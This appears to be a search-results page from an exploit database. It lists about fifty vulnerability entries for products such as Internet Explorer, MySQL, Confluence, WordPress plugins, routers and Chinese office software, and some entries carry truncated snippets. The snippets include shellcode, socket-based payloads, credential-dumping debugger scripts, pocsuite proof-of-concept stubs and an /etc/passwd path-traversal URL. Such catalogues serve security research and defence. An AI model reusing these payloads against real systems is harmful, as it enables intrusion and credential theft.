56796 matches found
Ali wangwang 2010 remote code execution vulnerability
漏洞复现 阿里旺旺2010版本的ImageMan.dll动态链接库中,有一个COM接口负责处理图片信息,其中有一个函数AutoPic存在漏洞,当在html中加载这个COM接口,并传入特殊字符串时,会由于对字符串长度没有进行检查,在拷贝时读取到不可用地址,从而导致程序进入SEH异常处理,通过超长payload可以覆盖SEH指针从而达到eip可控的效果,下面对此漏洞进行详细分析。 首先安装阿里旺旺2010,之后用IE打开,发现IE崩溃,通过附加windbg,可以到达漏洞崩溃位置。 a5c.628: Access violation - code c0000005 first chance...
Microsoft Internet Explorer 11.0.9600.18482 - Use After Free
No description provided by source. body background-color:lime; font-color:red; ; / Exploit Title: Internet Explorer 11 Use After Free Date: 05/09/2016 - 11/09/2016 Exploit Author: Marcin Ressel Vendor Homepage: https://www.microsoft.com/pl-pl/ Version: 11.0.9600.18482 Tested on: Windows 7 x64 0:0...
Tenda ADSL2/2+ Modem 963281TAN - not authorized to modify the DNS
No description provided by source. if $ -gt 3 || $ -lt 2 ; then echo " Tenda ADSL2/2+ Modem 963281TAN " echo " Unauthenticated Remote DNS Change Exploit" echo " ===================================================================" echo " Usage: $0 " echo " Example: $0 133.7.133.7 8.8.8.8" echo "...
UF FE office platform /assetsGroupReport/vendorContacts. jsp parameters startDate injection vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re import requests class TestPOCPOCBase: vulID = '' ssvid version = '1.0' author = '烽火戏诸侯' vulDate =...
LamaHub 0.0.62 remote code execution vulnerability
No description provided by source. import socket HOST = 'localhost' PORT = 4111 s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connectHOST, PORT buf = "" buf += "\x24\x53\x75\x70\x70\x6f\x72\x74\x73\x20\x55\x73" buf += "\x6c\x6c\x6f\x20\x49\x50\x32\x20\x65\x61\x72\x63" buf +=...
Atlassian Confluence arbitrary file include Vulnerability (CVE-2015-8399)
Affect the Assembly: Atlassian Confluence Atlassian Confluence is less than 5. 8. 17 versions of the service exist in the arbitrary file read and directory traversal vulnerabilities /spaces/viewdefaultdecorator. action? decoratorName=. Lists the current directory /spaces/viewdefaultdecorator...
Strongsoft FloodDisastersQueryContent. aspx parameters DirTypeDetailId SQL injection vulnerability
No description provided by source...
Strongsoft AjaxDeleteMsgInfo. ashx parameters msgid a SQL injection vulnerability
No description provided by source...
PHPIPAM v1.1.010 Multiple Vulnerabilities
No description provided by source...
PHP 'bcmath.c' Multiple Local Heap Overflow Vulnerabilities
No description provided by source...
Web Idea Pakistan product.php parameter pID SQL Injection
No description provided by source...
VideoIQ Camera local file inclusion vulnerability
No description provided by source...
Navicat Premium 11.2.11 (64bit) Local Password Disclosure
No description provided by source...
PHP 5.0.0 - 'snmpwalkoid()' local denial of service
No description provided by source...
WordPress RB Agency Plugin 2.4.7 - local file inclusion
漏洞出现在/ext/forcedownload.php http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd...
PHP 5.0.0 - 'fbird_[p]connect()' local denial of service
No description provided by source...
MySQL <= 5.7.15 remote Root code execution vulnerability
http://legalhackers.com - dawid at legalhackers.com - Release date: 12.09.2016 I. VULNERABILITY ------------------------- MySQL = 5.7.15 Remote Root Code Execution / Privilege Escalation 0day 5.6.33 5.5.52 MySQL clones are also affected, including: MariaDB PerconaDB II. BACKGROUND...
SugarCRM v6. 5. 23 PHP deserialize an object injection vulnerability
Author: p0wd3r know Chong Yu 404 security lab Date: 2016-09-12 0x00 vulnerability overview 1. Vulnerability description SugarCRM(http://www.sugarcrm.com/ is a set of open source Customer Relationship Management System. Recent researchers found in its=6.5.23 version exists in the deserialization...
UF FE /sysform/003/editflow_manager. jsp parameters of the UID injection vulnerability
No description provided by source...
MySQL 5.5.45 (64bit) - local credential information disclosure
No description provided by source. mport time from winappdbg import Debug, Process def b2hstr: return ''.join"%02X " % ordx for x in str.strip def h2bstr: bytes = str = ''.joinstr.split" " for i in range0, lenstr, 2: bytes.appendchrintstri:i+2, 16 return ''.joinbytes usr = '' pwd = '' count = 0...
UF FE /flex/newsmessage. jsp parameter uname injection vulnerability
No description provided by source...
UF A6 /yyoa/assess/js/initDataAssess. jsp information disclosure
No description provided by source...
Adobe ColdFusion < 11 Update 10 - XML external entity injection
Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - APSB16-30 - Release date: 31.08.2016 I. VULNERABILITY Adobe ColdFusion = 11 XML External Entity XXE Injection II. BACKGROUND "Adobe ColdFusion 11 Enterprise Edition offers a single platform to rapidly build and...
泛微 OA /js/swfupload/swfupload.swf xss漏洞
No description provided by source...
ZKTeco ZKAccess Security System 5.3.1 - stored XSS
Application description ZKAccess systems are built on flexible, open technology to provide management, real-time monitoring and control of your access control changes, access via a browser,without the need to install additional software. Security infrastructure devices centralized management,...
Joomla Extra Search v2.2.8 SQL Injection
No description provided by source...
UF FE /admin/systemXml/system-bean. xml information disclosure vulnerability
No description provided by source...
UF FE /feform/createprinttemplete. jsp parameters formid injection vulnerability
No description provided by source...
Belkin F9K1122v1 1.00.30 - Buffer Overflow (via Cross-Site Request Forgery)
No description provided by source. import socket, sys , base64, struct, string, urllib from getopt import getopt as GetOpt, GetoptError from uuid import getnode as getmac import SimpleHTTPServer, SocketServer TIMELINE ''' 3/16/2016 - First Submission to Belkin no response 5/3/2016 - Second...
Forticlient ™ end-SSLVPN 5.4 - credentials information disclosure
No description provided by source. from winappdbg import Debug, Process, HexDump import sys filename = "FortiTray.exe" 程序名 searchstring = "fortissl" 当用户凭证存储在进程内存中,模仿偏移 查询用户凭证函数 def memorysearch pid, strings : process = Process pid memdump =...
ZKTeco ZKBioSecurity 3.0 hard-coded login credentials and remote system command execution
No description provided by source...
ZKTeco ZKBioSecurity 3.0 - (visLogin. jsp) Local Authentication bypass
No description provided by source...
Wordpress timthumb-config. php arbitrary File Download
No description provided by source...
Joomla com_offices parameter file SQL blind injection vulnerability
No description provided by source...
Joomla com_jsjobs parameters oi SQL injection vulnerability
No description provided by source...
UF FE /feReport/chartList. jsp parameter reportId injection vulnerability
No description provided by source...
WordPress CYSTEME Finder plugin arbitrary file disclosure+upload vulnerability
No description provided by source...
UF FE office platform /security/role_add_user. jsp parameters searchValue SQL injection vulnerability
No description provided by source...
NScan 0.91 local code execution vulnerability
No description provided by source. import struct rp=struct.pack"L", 0x75658BD5 JMP ESP kernel32 Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit sc="\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"...
ENOMSOFT product.php parameter id SQL Injection
No description provided by source...
qBit /pages/getPage parameter p SQL Injection
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re import random import hashlib class TestPOCPOCBase: vulID = '1' ssvid version = '1.0' author =...
PHP 5.0.0 - imap_mail() local denial of service
No description provided by source...
erduo music \source\user\blog\ajax.php the variable content stored XSS
No description provided by source...
Simpla Admin v1.02 single-ads.php parameter ID SQL Injection
No description provided by source...
ESPCMS File Download information disclosure vulnerability
No description provided by source...
HelpDeskZ 1.0.2 unauthorized Shell upload
No description provided by source. ''' Exploit Title: HelpDeskZ /submitticketcontroller.php - Line 141 $filename = md5$FILES'attachment''name'.time.".".$ext; So by guessing the time the file was uploaded, we can get RCE. Steps to reproduce:...
SIEMENS IP Cameras variety of models chklogin. cgi information disclosure vulnerability
No description provided by source...
WordPress Vertical Gallery plugin arbitrary file upload vulnerability
No description provided by source...
cmseasy /imageUp.php xss vulnerability
No description provided by source...
WordPress Zero Spam <= 2.1.1 - unauthorized blind
No description provided by source...